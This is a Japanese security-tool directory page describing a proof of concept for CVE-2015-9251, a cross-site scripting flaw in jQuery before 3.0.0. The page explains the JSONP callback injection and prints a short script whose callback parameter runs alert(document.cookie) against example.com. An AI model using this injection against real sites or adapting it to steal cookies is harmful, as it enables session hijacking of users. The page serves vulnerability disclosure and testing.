Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2015-9251 — CVE-2015-9251(jQuery 3.0.0 未満)向け PoC | Kitploit
ツール/GitHubGitHub/moften/cve-2015-9251
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmoften/cve-2015-9251

CVE-2015-9251

CVE-2015-9251(jQuery 3.0.0 未満)向け PoC

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2015-9251

[email protected]

CVE-2015-9251(3.0.0 未満の jQuery)向けの PoC。

CVE-2015-9251 - PoC エクスプロイト

このリポジトリには、jQuery ライブラリの脆弱性 CVE-2015-9251 に対する Proof of Concept(PoC) が含まれています。この脆弱性は、jQuery が 3.0.0 より前のバージョンで callback パラメータへのコード注入を許可していたため、サニタイズされていない JSONP 呼び出しを介したクロスサイトスクリプティング(XSS)攻撃を可能にします。


説明

CVE-2015-9251 は、3.0.0 より前のバージョンの jQuery に影響します。この脆弱性は、JSONP リクエスト内の callback パラメータを操作することで悪用され、被害者のブラウザ上で任意の JavaScript コードを実行できる可能性があります。これにより、セッション Cookie などの機密データが漏えいする可能性があります。

要件

  1. テスト環境: 脆弱な Web アプリケーションは、3.0.0 未満の jQuery バージョンを使用している必要があります。
  2. Web ブラウザ: PoC を実行し、エクスプロイトの動作を確認するため。
  3. 検査ツール: ブラウザの DevTools は、結果を確認するのに役立ちます。

PoC の実行

PoC を実行するには、次の手順に従います。

  1. ブラウザのコンソールにコードをコピーして貼り付けるか、テスト用の HTML ページに含めます。

PoC コード:

root@kitploit:~
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
  // Función que simula una solicitud a un servidor vulnerable
  $.ajax({
    url: "https://example.com/api?callback=alert(document.cookie)",
    dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
    success: function(response) {
      console.log(response);
    }
  });
</script>
ツールをダウンロード